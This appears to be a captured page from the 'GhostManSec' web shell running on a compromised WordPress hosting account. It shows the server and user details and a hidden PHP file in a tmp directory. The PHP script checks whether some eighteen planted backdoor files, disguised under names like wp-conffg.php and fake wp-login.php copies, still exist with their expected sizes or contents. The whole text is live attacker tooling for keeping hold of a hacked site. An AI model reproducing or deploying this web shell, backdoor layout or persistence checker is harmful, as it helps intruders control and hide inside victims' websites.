GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/.cagefs/tmp/.dat
<?php   $r = '/home/niyknzcu/codershive.codes'; $x = ["/wp-includes/blocks/paragraph/wp-login.php"=>"bd@@1071825@@74",
"/wp-admin/css/colors/modern/wp-login.php"=>"bd@@1071465@@32",
"/wp-content/js/UWCDipm.php"=>"bd@@1072755@@8",
"/wp-conffg.php"=>"bd@@1072762@@71",
"/wp-admin/css/colors/modern/mAxeTy.php"=>"bd@@1072764@@98",
"/wp-admin/plugins/SimplePie/includes/mCvGc.php"=>"bd@@1072757@@80",
"/.well-known/pki-validation/addtemplateassoc.php"=>"bd@@922742@@976",
"/News.php"=>"bd@@923677@@13",
"/.well-known/pki-validation/addtemplateassoc.php"=>"bd@@923689@@77",
"/wp-content/js/includes/plugins/FTDXeT.php"=>"bd@@1072760@@51",
"/.well-known/PercentEncoder.php"=>"bd@@920200@@1060",
"/.well-known/PercentEncoder.php"=>"bd@@922707@@49",
"/wp-content/themes/twentytwenty/inc/wp-blog-header.php"=>"bd@@1071462@@34",
"/News.php"=>"bd@@920364@@1014",
"/wp-includes/revisson.php"=>"bd@@1071464@@32",
"/puc.php"=>"bd@@1070391@@31",
"/wp-content/themes/twentytwenty/huICa.php"=>"bd@@1071461@@79",
"/zk.php"=>"bd@@1068992@@74"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');